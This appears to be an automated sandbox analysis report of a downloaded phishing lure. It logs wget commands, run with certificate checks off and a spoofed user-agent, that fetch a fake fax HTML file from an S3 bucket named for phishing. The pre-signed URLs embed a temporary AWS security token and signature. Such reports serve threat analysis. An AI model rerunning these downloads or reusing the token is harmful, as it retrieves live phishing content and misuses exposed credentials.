Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3b%20filename%3d%22faxdocument-873422-wcepinc-transmission.html%22%3b%20filename%2a%3dutf-8%27%27faxdocument-873422-wcepinc-transmission.html&x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=asia37krem2qlqcgjml5%2f20241024%2fus-east-1%2fs3%2faws4_request&x-amz-date=20241024t201816z&x-amz-expires=15711&x-amz-security-token=iqojb3jpz2lux2vjehmacxvzlwvhc3qtmsjimeyciqd5%2bhzvzgn6j3fxb1eh7jhgjfyatdm4yse%2fb1lhu54clwihamgxufenqyupv%2fcfnjf%2fm%2bjk%2fqrmeneohuay3bkekkvekogecnz%2f%2f%2f%2f%2f%2f%2f%2f%2f%2fweqabomodizmtkzmjy1odi0igxkadsnklcvctvwmwiq3apvqpqpi58knfbaui%2fesqh1fjltx%2blsdpxwhmieoa7jjlduxndzztecvouwvp1oli1h3ptjspl3wxfiui7btzihzeqp3qn85awxido1fwb1mbpd%2fsdfsrqmegho9oqjpzpsqhm6e%2bmlmz1ytihd97pf%2fn08letryezz2nfjviqrlytvwqwr2qpezjyim0wnusbbq8q1iymha%2fiyvb9zkxoppvdgr1ptxz6oljzsy%2bt%2bjafeiswzysrdwwvlziujqwg%2b63t%2bpcq3bxmyasshjxnzarim7hms4aoj9sivr9pkl0wwd3qkwg7obyhnb8k0%2b1azzdj2e%2fflvd9tiwcg1kstezsabhjpeebxtzduckidp%2fcb%2fycv03kyjnwwzumaibwdrv3llj4itvulpzpubom8rjchrmb83tr2qzdnkkjyktsr42en1uqps%2bu0qdc%2fg93%2ffw2lixwumotybf1fwyey2oqz6e5eroigwqhmg4wje1zzgjwp8feqsg0yo9xznxr%2fyau%2bet2rnzwy2whuozk3hvwps4lwnhtytcrsndmgkxkfvspheqcqkf3xveabehd%2f9qqutdiicwnbbalsilk5euphzylvkimybmtiectf00%2ffhqo4eoclx5sgvdchqeq4bjqkaeyfm5a%2febzwf4uw87xmbquziribz00bbmxsr1f6inqrk5eiamnksyuyh%2fp3yjofau0ox8%2fovlihbkp3wtdzd5b5%2f5wwioymht1u0bdnhnt%2f%2b11yttesy4rc4fiydhkm7tzrfs9sa1wiiqxgqibqqjkrydzt%2flrmsyvtvk8wbscwkrvzxnu%2bsi4oujjhkmj27ywwc3ob5ne4d4%2fwryfib%2f4hwjo4&x-amz-signedheaders=host&x-amz-signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3b%20filename%3d%22faxdocument-873422-wcepinc-transmission.html%22%3b%20filename%2a%3dutf-8%27%27faxdocument-873422-wcepinc-transmission.html&x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=asia37krem2qlqcgjml5%2f20241024%2fus-east-1%2fs3%2faws4_request&x-amz-date=20241024t201816z&x-amz-expires=15711&x-amz-security-token=iqojb3jpz2lux2vjehmacxvzlwvhc3qtmsjimeyciqd5%2bhzvzgn6j3fxb1eh7jhgjfyatdm4yse%2fb1lhu54clwihamgxufenqyupv%2fcfnjf%2fm%2bjk%2fqrmeneohuay3bkekkvekogecnz%2f%2f%2f%2f%2f%2f%2f%2f%2f%2fweqabomodizmtkzmjy1odi0igxkadsnklcvctvwmwiq3apvqpqpi58knfbaui%2fesqh1fjltx%2blsdpxwhmieoa7jjlduxndzztecvouwvp1oli1h3ptjspl3wxfiui7btzihzeqp3qn85awxido1fwb1mbpd%2fsdfsrqmegho9oqjpzpsqhm6e%2bmlmz1ytihd97pf%2fn08letryezz2nfjviqrlytvwqwr2qpezjyim0wnusbbq8q1iymha%2fiyvb9zkxoppvdgr1ptxz6oljzsy%2bt%2bjafeiswzysrdwwvlziujqwg%2b63t%2bpcq3bxmyasshjxnzarim7hms4aoj9sivr9pkl0wwd3qkwg7obyhnb8k0%2b1azzdj2e%2fflvd9tiwcg1kstezsabhjpeebxtzduckidp%2fcb%2fycv03kyjnwwzumaibwdrv3llj4itvulpzpubom8rjchrmb83tr2qzdnkkjyktsr42en1uqps%2bu0qdc%2fg93%2ffw2lixwumotybf1fwyey2oqz6e5eroigwqhmg4wje1zzgjwp8feqsg0yo9xznxr%2fyau%2bet2rnzwy2whuozk3hvwps4lwnhtytcrsndmgkxkfvspheqcqkf3xveabehd%2f9qqutdiicwnbbalsilk5euphzylvkimybmtiectf00%2ffhqo4eoclx5sgvdchqeq4bjqkaeyfm5a%2febzwf4uw87xmbquziribz00bbmxsr1f6inqrk5eiamnksyuyh%2fp3yjofau0ox8%2fovlihbkp3wtdzd5b5%2f5wwioymht1u0bdnhnt%2f%2b11yttesy4rc4fiydhkm7tzrfs9sa1wiiqxgqibqqjkrydzt%2flrmsyvtvk8wbscwkrvzxnu%2bsi4oujjhkmj27ywwc3ob5ne4d4%2fwryfib%2f4hwjo4&x-amz-signedheaders=host&x-amz-signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\wget.exe

Queries volume information: C:\Users\user\Desktop\download VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1541500
Product:	CloudBasic
Start time:	22:21:34
Start date:	24.10.2024
Cookbook:	urldownload.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs